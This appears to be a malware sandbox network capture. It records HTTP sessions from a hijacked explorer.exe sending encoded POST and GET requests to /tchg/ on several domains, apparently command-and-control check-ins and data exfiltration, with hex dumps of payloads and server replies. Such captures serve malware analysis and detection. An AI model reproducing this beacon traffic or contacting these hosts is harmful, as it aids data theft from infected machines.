                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 66 69 65 6c 64 73 65 74 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f
                                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are loo
                                                                                                                    May 30, 2023 11:13:57.481782913 CEST1938INData Raw: 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61
                                                                                                                    Data Ascii: king for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    107192.168.11.2049866162.214.206.20080C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:13:59.668313980 CEST1939OUTGET /tchg/?O0qEM=4yLegaT1sivciznwGwL+1oWFxAOSGQRZOQeAHXS5UhA0sXonzOuQC/8xHc6XJGn9K9HBDd08hbjXm0qB4TniN4OVF/4Ot7tkHQ==&2ax=jRqfPy4_lz2 HTTP/1.1
                                                                                                                    Host: www.scottsteedley.com
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                    Data Ascii:
                                                                                                                    May 30, 2023 11:13:59.835793972 CEST1940INHTTP/1.1 404 Not Found
                                                                                                                    Content-Type: text/html
                                                                                                                    Server: Microsoft-IIS/10.0
                                                                                                                    X-Powered-By: ASP.NET
                                                                                                                    Date: Tue, 30 May 2023 09:13:59 GMT
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 1245
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 66 69 65 6c 64 73 65 74 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f
                                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are loo
                                                                                                                    May 30, 2023 11:13:59.835835934 CEST1940INData Raw: 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61
                                                                                                                    Data Ascii: king for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    108192.168.11.2049867213.171.195.10580C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:14:04.889312983 CEST1941OUTPOST /tchg/ HTTP/1.1
                                                                                                                    Host: www.arrangeabreak.com
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 187
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Origin: http://www.arrangeabreak.com
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Accept: */*
                                                                                                                    Referer: http://www.arrangeabreak.com/tchg/
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Data Raw: 4f 30 71 45 4d 3d 46 67 43 45 4a 35 46 67 66 5f 58 4f 51 51 78 2d 72 72 4b 70 6e 47 6a 41 6b 65 37 42 62 70 64 44 74 37 48 42 51 4c 36 53 32 6c 4a 57 6a 69 38 50 52 67 51 69 51 63 35 51 54 70 76 4d 57 6b 4b 35 62 6e 73 30 33 30 33 44 55 33 65 49 46 6c 4a 6c 77 5a 63 34 64 37 77 49 71 6e 68 68 77 32 65 4f 72 38 67 77 69 37 74 73 42 73 62 58 4d 74 55 47 6c 78 33 6a 6b 47 5a 6b 46 74 49 73 35 79 67 34 35 53 44 56 57 39 4a 7a 6e 37 51 57 33 64 28 70 58 71 42 54 64 6e 75 73 68 38 78 4d 43 4a 7a 38 57 71 6b 63 68 4c 4f 55 51 32 54 6a 6b 33 48 66 4b 51 29 2e 00 00 00 00 00 00 00 00
                                                                                                                    Data Ascii: O0qEM=FgCEJ5Fgf_XOQQx-rrKpnGjAke7BbpdDt7HBQL6S2lJWji8PRgQiQc5QTpvMWkK5bns0303DU3eIFlJlwZc4d7wIqnhhw2eOr8gwi7tsBsbXMtUGlx3jkGZkFtIs5yg45SDVW9Jzn7QW3d(pXqBTdnush8xMCJz8WqkchLOUQ2Tjk3HfKQ).
                                                                                                                    May 30, 2023 11:14:04.913955927 CEST1942INHTTP/1.1 405 Not Allowed
                                                                                                                    Server: nginx/1.20.1
                                                                                                                    Date: Tue, 30 May 2023 09:14:04 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 157
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.1</center></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    109192.168.11.2049868213.171.195.10580C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:14:07.431772947 CEST1943OUTPOST /tchg/ HTTP/1.1
                                                                                                                    Host: www.arrangeabreak.com
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 527
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Origin: http://www.arrangeabreak.com
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Accept: */*
                                                                                                                    Referer: http://www.arrangeabreak.com/tchg/
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Data Raw: 4f 30 71 45 4d 3d 46 67 43 45 4a 35 46 67 66 5f 58 4f 52 7a 70 2d 6b 73 65 70 77 32 6a 44 6f 2d 37 42 41 35 64 48 74 37 44 42 51 50 4b 43 32 57 74 57 6a 44 4d 50 57 6c 38 69 58 63 35 51 4b 5a 75 49 59 45 4b 6d 62 6e 67 47 33 31 4c 44 55 33 61 49 45 58 78 6c 35 4a 63 5f 46 4c 77 50 36 48 68 6b 30 32 65 54 72 38 63 73 69 35 52 73 43 64 33 58 65 62 67 47 30 56 72 69 67 6d 5a 6d 55 39 49 7a 7a 53 67 32 35 53 28 64 57 35 45 4f 6e 4b 55 57 33 39 66 70 57 71 42 51 50 33 75 72 74 63 77 53 4f 6f 75 30 63 36 51 58 34 70 53 47 4c 43 57 78 74 6b 58 52 5a 49 4f 33 51 5f 6e 52 39 46 72 65 48 70 50 42 71 2d 39 4f 43 50 37 59 38 52 38 56 30 63 33 5f 51 47 79 4f 74 53 31 37 38 33 31 5a 48 42 78 6b 5a 59 78 67 75 6c 4c 70 6b 79 4e 6a 7a 50 43 7a 72 39 42 41 63 62 75 36 47 73 5a 42 58 48 72 70 28 31 61 48 62 55 79 61 54 67 66 34 55 79 4c 69 6c 72 63 66 75 55 76 6b 4a 42 28 66 6e 59 4c 57 6c 67 61 4e 69 57 52 6e 6c 74 53 72 43 66 33 66 4a 48 6a 53 55 49 58 6e 54 6f 63 77 7e 64 50 64 4b 36 77 30 4f 59 51 6f 73 33 72 59 45 6a 54 45 36 44 49 63 46 6b 63 5f 32 31 5a 43 6d 6a 6a 58 6e 66 4b 4f 62 32 78 57 55 71 43 31 48 5f 67 6c 62 65 51 31 35 50 47 36 56 32 4b 69 33 34 35 35 58 4d 5a 34 76 42 49 54 4c 74 6b 53 38 6a 5a 31 58 4a 67 5f 57 58 41 7a 76 53 30 69 6f 5a 79 42 36 32 6b 56 4f 42 57 4c 31 65 30 6e 54 73 58 42 56 73 69 46 38 46 6a 45 48 5f 69 32 76 78 44 38 5a 54 68 49 30 5f 66 4e 42 59 62 6d 72 61 64 35 77 76 45 58 50 53 4c 7a 72 62 76 67 78 4a 54 5a 70 76 67 38 7e 79 49 50 79 65 59 4a 4a 4f 32 65 36 73 72 50 74 4a 77 37 76 65 67 6e 33 79 38 7a 62 57 6d 39 7e 47 38 2e 00 00 00 00 00 00 00 00
                                                                                                                    Data Ascii: O0qEM=FgCEJ5Fgf_XORzp-ksepw2jDo-7BA5dHt7DBQPKC2WtWjDMPWl8iXc5QKZuIYEKmbngG31LDU3aIEXxl5Jc_FLwP6Hhk02eTr8csi5RsCd3XebgG0VrigmZmU9IzzSg25S(dW5EOnKUW39fpWqBQP3urtcwSOou0c6QX4pSGLCWxtkXRZIO3Q_nR9FreHpPBq-9OCP7Y8R8V0c3_QGyOtS17831ZHBxkZYxgulLpkyNjzPCzr9BAcbu6GsZBXHrp(1aHbUyaTgf4UyLilrcfuUvkJB(fnYLWlgaNiWRnltSrCf3fJHjSUIXnTocw~dPdK6w0OYQos3rYEjTE6DIcFkc_21ZCmjjXnfKOb2xWUqC1H_glbeQ15PG6V2Ki3455XMZ4vBITLtkS8jZ1XJg_WXAzvS0ioZyB62kVOBWL1e0nTsXBVsiF8FjEH_i2vxD8ZThI0_fNBYbmrad5wvEXPSLzrbvgxJTZpvg8~yIPyeYJJO2e6srPtJw7vegn3y8zbWm9~G8.
                                                                                                                    May 30, 2023 11:14:07.456044912 CEST1944INHTTP/1.1 405 Not Allowed
                                                                                                                    Server: nginx/1.20.1
                                                                                                                    Date: Tue, 30 May 2023 09:14:07 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 157
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.1</center></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    11192.168.11.204977023.104.137.18580C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:08:35.466717005 CEST453OUTPOST /tchg/ HTTP/1.1
                                                                                                                    Host: www.tsygy.com
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 187
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Origin: http://www.tsygy.com
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Accept: */*
                                                                                                                    Referer: http://www.tsygy.com/tchg/
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Data Raw: 4f 30 71 45 4d 3d 77 5a 70 44 62 4c 57 31 62 64 51 48 36 50 68 4a 62 4d 56 79 52 51 56 6e 55 31 62 64 64 77 65 50 43 33 70 34 4e 6a 70 30 72 49 57 42 76 43 39 55 68 2d 70 67 64 74 6d 7a 76 6b 79 33 51 66 48 50 4a 38 37 5f 55 36 32 7a 4a 44 4a 7a 33 72 75 46 6b 5a 53 47 6f 38 42 39 4a 67 68 39 4c 49 4b 41 6c 35 79 32 41 34 44 58 7a 55 69 5f 56 53 28 53 6e 57 6e 51 6f 6e 64 4e 4a 6f 6c 37 57 41 77 6f 74 66 57 78 44 4c 61 45 31 78 30 4e 56 70 44 7a 48 76 6f 42 57 33 6c 59 7a 68 6c 55 57 62 55 76 31 42 51 35 37 6a 76 39 7e 63 35 43 69 42 38 79 32 41 29 2e 00 00 00 00 00 00 00 00
                                                                                                                    Data Ascii: O0qEM=wZpDbLW1bdQH6PhJbMVyRQVnU1bddwePC3p4Njp0rIWBvC9Uh-pgdtmzvky3QfHPJ87_U62zJDJz3ruFkZSGo8B9Jgh9LIKAl5y2A4DXzUi_VS(SnWnQondNJol7WAwotfWxDLaE1x0NVpDzHvoBW3lYzhlUWbUv1BQ57jv9~c5CiB8y2A).
                                                                                                                    May 30, 2023 11:08:35.634145975 CEST453INHTTP/1.1 200 OK
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Content-Encoding: gzip
                                                                                                                    Server: Nginx Microsoft-HTTPAPI/2.0
                                                                                                                    X-Powered-By: Nginx
                                                                                                                    Date: Tue, 30 May 2023 09:08:32 GMT
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 61 0d 0a 1f 8b 08 00 00 00 00 00 04 00 0d 0a
                                                                                                                    Data Ascii: a
                                                                                                                    May 30, 2023 11:08:35.634517908 CEST454INData Raw: 32 61 66 0d 0a c5 55 3f 73 d3 30 14 ff 2a c6 3d 48 7b d7 c4 92 25 39 96 9d 78 29 cc 30 74 61 74 6d 25 11 75 2c 63 2b 75 d2 91 8d a1 ac 2c 4c b0 74 68 cb c0 50 0e 8e eb 97 81 36 4c 7c 05 24 d9 40 da 2b 3d b8 eb 5d 3d f8 67 e9 fd fb e9 bd a7 e7 1f
                                                                                                                    Data Ascii: 2afU?s0*=H{%9x)0tatm%u,c+u,LthP6L|$@+=]=g>~5,5fy5'RuQOcRJ*h X`BFEU\z05zCO(1)op2@KI?8)lQ2l+dwMKSV%%/$%E?jd
                                                                                                                    May 30, 2023 11:08:35.634553909 CEST454INData Raw: 38 0d 0a ee 6a 61 23 a4 06 00 00 0d 0a
                                                                                                                    Data Ascii: 8ja#
                                                                                                                    May 30, 2023 11:08:35.634582043 CEST454INData Raw: 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    110192.168.11.2049869213.171.195.10580C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:14:09.979192972 CEST1950OUTPOST /tchg/ HTTP/1.1
                                                                                                                    Host: www.arrangeabreak.com
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 51815
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Origin: http://www.arrangeabreak.com
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Accept: */*
                                                                                                                    Referer: http://www.arrangeabreak.com/tchg/
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Data Raw: 4f 30 71 45 4d 3d 46 67 43 45 4a 35 46 67 66 5f 58 4f 52 7a 70 2d 6b 73 65 70 77 32 6a 44 6f 2d 37 42 41 35 64 48 74 37 44 42 51 50 4b 43 32 57 6c 57 6b 78 55 50 57 47 6b 69 57 63 35 51 56 70 75 46 59 45 4b 72 62 6e 49 43 33 31 48 39 55 30 79 49 46 48 42 6c 34 38 6f 5f 41 4c 77 4f 6a 48 68 6d 77 32 66 45 72 38 67 34 69 34 31 61 42 73 54 58 4d 73 6b 47 6c 53 66 6a 28 47 5a 6b 55 39 49 33 33 53 68 44 35 53 4b 43 57 35 41 4f 6e 50 55 57 30 72 62 70 55 39 74 51 49 6e 75 6f 6e 38 78 53 45 49 75 56 63 36 56 6d 34 70 53 73 4c 47 75 78 74 6a 72 52 59 50 69 30 51 66 6e 52 7e 46 72 66 4d 4a 44 46 71 2d 4a 57 43 50 50 59 38 57 41 56 6c 4d 33 5f 41 33 79 4e 6b 53 31 35 33 58 31 30 4e 52 39 38 5a 59 6c 30 75 6b 76 70 6b 69 5a 6a 7a 34 75 7a 70 66 35 41 53 62 75 34 49 4d 59 62 64 6e 72 50 28 30 32 62 62 56 54 74 54 69 7a 34 56 54 48 69 31 61 63 59 73 30 76 39 4d 42 28 4f 6a 59 33 4b 6c 67 72 53 69 57 52 33 6c 76 7e 72 43 73 28 66 49 46 62 56 56 34 58 73 66 49 63 6c 6e 4e 4c 48 4b 37 63 76 4f 59 4a 74 73 32 6a 59 45 44 54 45 38 67 